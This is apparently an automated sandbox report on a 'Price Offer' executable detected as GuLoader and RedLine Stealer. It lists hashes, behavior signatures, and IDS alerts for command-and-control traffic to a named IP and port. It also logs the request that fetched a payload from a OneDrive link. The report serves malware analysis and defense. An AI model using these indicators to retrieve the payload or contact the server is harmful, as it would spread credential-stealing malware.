Windows Analysis Report
Price Offer_1200R4 1200R20.exe

Overview

General Information

Sample name: Price Offer_1200R4 1200R20.exe
Analysis ID: 1472462
MD5: 4778e666c0776a614b0c3482a34874e7
SHA1: 94055440790747bd0247a15e21cb64e617c1f0fd
SHA256: 14f52da07995de5bd50d4ab4989741ffd5ced7f77b8c7e4c86f82939cebae8bc
Tags: exe

Detection

GuLoader, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected RedLine Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection

Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe ReversingLabs: Detection: 31%
Source: Price Offer_1200R4 1200R20.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Price Offer_1200R4 1200R20.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Price Offer_1200R4 1200R20.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405A4F
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_00406620 FindFirstFileA,FindClose, 0_2_00406620
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004027CF FindFirstFileA, 0_2_004027CF
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_00405A4F
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_00406620 FindFirstFileA,FindClose, 4_2_00406620
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_004027CF FindFirstFileA, 4_2_004027CF

Networking

Source: Traffic Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49740 -> 178.23.190.118:1912
Source: Traffic Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49740 -> 178.23.190.118:1912
Source: Traffic Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 178.23.190.118:1912 -> 192.168.2.4:49740
Source: Traffic Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 178.23.190.118:1912 -> 192.168.2.4:49740
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 178.23.190.118:1912
Source: Joe Sandbox View IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View ASN Name: LYNERO-ASDK LYNERO-ASDK
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /download?resid=F547EE3E8FFF6BF5%21682&authkey=!AAAtK601mA4WJes HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: onedrive.live.comCache-Control: no-cacheCookie: MUID=00C7A97535A662F221B7BAEA31A666AD
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: global traffic DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic DNS traffic detected: DNS query: gcwema.bn.files.1drv.com
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: Gastrostomize.exe, Gastrostomize.exe, 00000004.00000000.1821252336.000000000040A000.00000008.00000001.01000000.00000006.sdmp, Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://s.symcd.com06
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/D
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
